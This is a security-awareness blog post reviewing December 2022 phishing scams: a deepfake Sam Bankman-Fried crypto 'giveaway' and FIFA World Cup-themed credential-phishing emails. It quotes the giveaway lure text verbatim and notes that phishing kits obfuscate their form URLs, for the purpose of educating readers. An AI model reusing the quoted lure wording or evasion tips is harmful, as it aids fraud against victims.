Catches of the Month: Phishing Scams for December 2022

Welcome to our December 2022 review of phishing attacks, in which we explore the latest email scams and the tactics that cyber criminals use to trick people into handing over personal data.

This month, we delve into a scheme capitalising on the fall of FTX and review the a scam exploiting people’s excitement over the World Cup.

FTX customers offered refund in deepfake phishing scam

Somehow, things are getting even worse for FTX. The cryptocurrency exchange platform spiralled into bankruptcy last month, after a revelation that its partner firm, Alameda Research, held a significant portion of its assets in FTX’s native token FTT.

That leak caused rival exchange Binance to announce that it would sell its holdings in FTT. It created a huge spike in customer withdrawals that FTX couldn’t meet, resulting in its sudden collapse.

Binance initially signed a letter of intent to acquire the firm to ensure that customers could recover their assets from FTX, but the exchange withdrew its offer after it learned that the firm mishandled customer funds and is facing regulatory investigation.

The chaos has made FTX users justifiably eager to receive compensation, and that has opened to the door for scammers.

On Friday, a deepfake video emerged on Twitter that appeared to show FTX founder Sam Bankman-Fried offering an opportunity for users to recoup their losses.

“Hello everyone. As you know our FTX exchange is going bankrupt,” the deepfake of Bankman-Fried said.

“But I hasten to inform all users that you should not panic. As compensation for the loss we have prepared a giveaway for you in which you can double your cryptocurrency. To do this, just go to the site”

Users who follow the link are redirected to a website that reads: “Biggest giveaway crypto of $100,000,000.

“Send the desired number of coins to the special address below. Once we receive your transaction, we will immediately send the requested amount back to you. You can only take part in our giveaway once. Hurry up!”

To compound matters, the video was posted from a Twitter account that fully replicated Bankman-Fried’s, thanks to the site’s recent blue-checkmark fiasco which allowed anyone to verify themselves if they paid a subscription fee.

The account, which belongs to the now-suspended Twitter user “s4ge_ETH”, was verified, had Bankman-Fried’s handle “SBF” and his Twitter avatar.

The video directed viewers to visit a website where they could enter a giveaway to win cryptocurrency. These are common scams and are often run using accounts that impersonate celebrities – although the use of deepfake footage takes this to another level.

However, such schemes could occur more often as deepfake technology becomes more sophisticated and widely accessible. There are already websites and apps that people can use to doctor videos, and many people remain unaware about the existence of the technology, which could make it a powerful weapon in fraudsters’ arsenal.

Watch out for World Cup phishing emails

Scammers are always looking for current events they can use to lend their schemes a sense of legitimacy. With the World Cup currently taking place, it shouldn’t come as a surprise to see a spate of phishing campaigns using the tournament as a pretext.

A series of phishing emails were discovered by the security firm Trellix. In one, the email appeared to come from the FIFA TMS (transfer matching system) helpdesk and claimed that the recipient’s two-factor authentication mechanism had been turned off.

The email contained a link that redirected the user to a bogus website that was designed to capture their login credentials.

Source: Trellix

Another scam impersonated Auckland City FC manager David Firisua, who was supposedly seeking confirmation of a payment made to the recipient related to FIFA. Other phishing emails impersonate FIFA’s ticketing office, WeTransfer and Snoonu, the official food delivery partner of the World Cup.

Trellix also found bogus web pages that look like legitimate FIFA content, and warned people that scammers are “multiple phishing kits where the post URL is either obfuscated, Base64 encoded or present in the ajax request instead of form action tags”.

Although the final of this year’s World Cup is only a week or so away, Trellix doesn’t believe that the phishing attacks will stop as soon as the tournament ends.

It said that the scams could continue to run through to next year, and warned that organisations directly related to the tournament should remain “extra-vigilant”.

Can you spot a scam?

All organisations are vulnerable to phishing, no matter their size or sector, so it’s essential to understand how you might be targeted and what you can do to prevent a breach.

You can help educate your staff with IT Governance’s Phishing Staff Awareness Training Programme.

This 45-minute course uses real-world examples like the ones we’ve discussed here to explain how phishing attacks work, the tactics that cyber criminals use and how you can detect malicious emails.